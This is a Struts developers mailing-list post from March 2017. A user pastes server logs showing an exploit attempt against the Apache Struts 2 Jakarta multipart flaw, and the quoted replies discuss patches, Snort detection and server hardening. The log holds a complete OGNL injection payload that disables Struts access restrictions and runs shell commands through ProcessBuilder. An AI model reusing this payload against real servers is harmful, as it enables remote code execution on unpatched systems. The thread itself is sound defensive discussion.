Looking at my logs I can see some activity: GRRR :
179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action
HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
2017-03-24 08:39:13,649 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Request exceeded size limit!
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException:
the request doesn't contain a multipart/form-data or multipart/mixed
stream, content type header is %{(#nike='multipart/form-data'
).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_
memberAccess?(#_memberAccess=#dm):((#container=#context['
com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.
getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.
getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#
iswin=(@java.lang.System@getProperty('os.name').
toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/
c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#
cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@
org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@
org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.
flush())}
On 16 March 2017 at 12:45, Martin Gainty <mgai...@hotmail.com> wrote:
>
>
>
>
> ________________________________
> From: Greg Huber <gregh3...@gmail.com>
> Sent: Thursday, March 16, 2017 5:19 AM
> To: Struts Developers List
> Subject: Re: S2 makes Hacker News :/
>
> Just because you are using s2, does not necessarily mean you are affected,
> all I get is a response :
>
> HTTP/1.1 404
> Content-Length: 0
> Date: Thu, 16 Mar 2017 09:02:54 GMT
> Connection: close
>
> Looking at my logs this fishing is going on all the time.
>
> MG>from what i read injections only happen with Content-Type injection
>
> MG>then again patches Struts 2.3.32 or 2.5.10.1 has been available for
> some time
>
> MG>Johannes suggests implementing 'snort' to detect injection
> vulnerability reference link at sans.edu below:
> https://isc.sans.edu/forums/diary/Critical+Apache+Struts+
> 2+Vulnerability+Patch+Now/22169/
>
> MG>Thanks Lukasz!
>
> Thanks also Lukasz for the quick fix.
>
> Cheers Greg
>
>
>
>
> On 14 March 2017 at 18:17, Lukasz Lenart <lukaszlen...@apache.org> wrote:
>
> > 2017-03-14 15:57 GMT+01:00 Doug Erickson <erick...@part.net>:
> > > What is the proper server setup to prevent this?
> >
> > Upgrade to the latest Struts version ... and run server on a dedicated
> > account, block access to the world (sever should be only allowed to
> > connect to localhost) and few other things
> >
> >
> > Regards
> > --
> > Łukasz
> > + 48 606 323 122 http://www.lenart.org.pl/
> Łukasz Lenart - strona domowa<http://www.lenart.org.pl/>
> www.lenart.org.pl
> pasja ciągle coś nowego. programowanie, tworzenie jest dla mnie życiową
> pasją, jak dotąd udaje mi sie łączyć to co lubię z tym za co mi płacą i ...
>
>
>
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org
> > For additional commands, e-mail: dev-h...@struts.apache.org
> >
> >
>
